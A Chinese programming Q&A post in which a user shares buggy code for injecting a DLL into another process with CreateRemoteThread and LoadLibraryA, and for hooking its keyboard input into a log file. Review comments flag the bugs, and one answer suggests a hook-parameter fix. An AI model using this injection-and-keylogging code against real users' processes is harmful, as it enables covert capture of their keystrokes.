我试图通过注入的 DLL 从另一个进程获取键盘消息，但不知道应该在自己程序的哪个位置调用该函数。这是我注入的 DLL 函数：
//this is my dll main function
// DLL entry point. On every call (process/thread attach and detach) it opens the
// log file in append mode, dispatches on the reason code, then closes the file.
// hInst and hkb are not declared in this snippet — presumably file-scope globals.
// NOTE(review): the fopen_s result is never checked; if the open fails, `file` is
// NULL and the fprintf/fclose below dereference it.
// NOTE(review): DllMain runs under the loader lock; doing file I/O and calling
// SetWindowsHookEx from here is discouraged by the DllMain documentation — confirm.
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
/* open file */
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
// remember this DLL's module handle for the hook installer
hInst = (HINSTANCE)hModule;
// should be function calling be here????
installhook();
break;
case DLL_PROCESS_DETACH:
fprintf(file, "DLL detach function called.\n");
break;
case DLL_THREAD_ATTACH:
fprintf(file, "DLL thread attach function called.\n");
break;
case DLL_THREAD_DETACH:
fprintf(file, "DLL thread detach function called.\n");
break;
}
// redundant: hInst was already assigned in the DLL_PROCESS_ATTACH case above
hInst = (HINSTANCE)hModule;
/* close file */
fclose(file);
return TRUE;
}
这是我的安装钩子函数，用于安装 KeyboardProc 进行处理：
// Installs a WH_KEYBOARD hook scoped to the calling thread (GetCurrentThreadId()),
// storing the hook handle in the global hkb.
// Returns TRUE unconditionally — the SetWindowsHookEx result is not checked, so a
// NULL hook handle (installation failure) is still reported as success.
// NOTE(review): targetWnd, hProcess and processID are declared but never used.
BOOL __declspec(dllexport)__stdcall installhook()
{
HWND targetWnd;
HANDLE hProcess;
unsigned long processID = 0;
// hMod is passed as hInst (this DLL's module handle); the answer below quotes
// MSDN as requiring NULL here when the hook procedure is in the current process.
hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId());
return TRUE;
}
这是我的 KeyboardProc 函数体：
// WH_KEYBOARD hook procedure. Shows a message box on every invocation, then, when
// nCode is HC_ACTION and bit 30 of lParam is set (presumably the previous-key-state
// flag — confirm against the WH_KEYBOARD lParam docs), appends to the log file for
// space/return or any virtual-key code in [0x2f, 0x100]. Always chains to the next hook.
// NOTE(review): `nCode + ".\n"` is pointer arithmetic on a 3-byte string literal, not
// string concatenation; for nCode > 2 it reads past the literal (undefined behaviour),
// and the result is passed as a non-literal format string.
// NOTE(review): the fopen_s result is unchecked and the FILE* is never fclose'd, so
// every logged keystroke leaks a file handle.
// NOTE(review): MessageBoxA blocks the hooked thread until dismissed.
LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
char ch; // unused
MessageBoxA(nullptr, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING);
do // single-pass loop; no `break` inside, so it adds nothing
{
if (((DWORD)lParam & 0x40000000) && (HC_ACTION == nCode))
{
// && binds tighter than ||: SPACE || RETURN || (0x2f <= wParam <= 0x100)
if ((wParam == VK_SPACE) || (wParam == VK_RETURN) || (wParam >= 0x2f) && (wParam <= 0x100))
{
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
fprintf(file, nCode + ".\n");
}
}
} while (0);
return CallNextHookEx(hkb, nCode, wParam, lParam);
}
最后，这是我的主程序，在这里我把 DLL 注入目标进程：
// Injector body (C++ — uses cout). Target PID is hard-coded; `buffer` is not
// defined in this snippet (presumably the DLL path string used by LoadLibraryA).
// NOTE(review): none of the error branches return or exit, so each later call runs
// with a NULL handle/address when an earlier step failed.
int procID = 9448;
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
if (process == NULL) {
printf("Error: the specified process couldn't be found.\n");
}
/*
* Get address of the LoadLibrary function.
*/
LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (addr == NULL) {
printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
}
/*
* Allocate new memory region inside the process's address space.
*/
LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (arg == NULL) {
printf("Error: the memory could not be allocated inside the chosen process.\n");
}
/*
* Write the argument to LoadLibraryA to the process's newly allocated memory region.
*/
int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
if (n == 0) {
printf("Error: there was no bytes written to the process's address space.\n");
}
cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:"<<n<<"\n";
/*
* Inject our DLL into the process's address space.
*/
// NOTE(review): the returned thread handle is never closed (handle leak).
HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
if (threadID == NULL) {
printf("Error: the remote thread could not be created.\n");
}
else {
printf("Success: the remote thread was successfully created.\n");
}
/*
* Close the handle to the process, becuase we've already injected the DLL.
*/
CloseHandle(process);
我的代码有什么问题？必须改动哪些地方才能得到想要的结果？
答案 0 :(得分:1)
是的，可以在 DLL_PROCESS_ATTACH 中调用它。但根据 MSDN 的说明：
hMod [in] 类型：HINSTANCE。包含 lpfn 参数所指向的钩子过程的 DLL 的句柄。如果 dwThreadId 参数指定的是由当前进程创建的线程，并且钩子过程位于与当前进程关联的代码中，则 hMod 参数必须设置为 NULL。
所以请把 hMod 改为 NULL：
// hMod = NULL: thread-scoped hook whose procedure lives in the current process's code
hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, NULL, GetCurrentThreadId());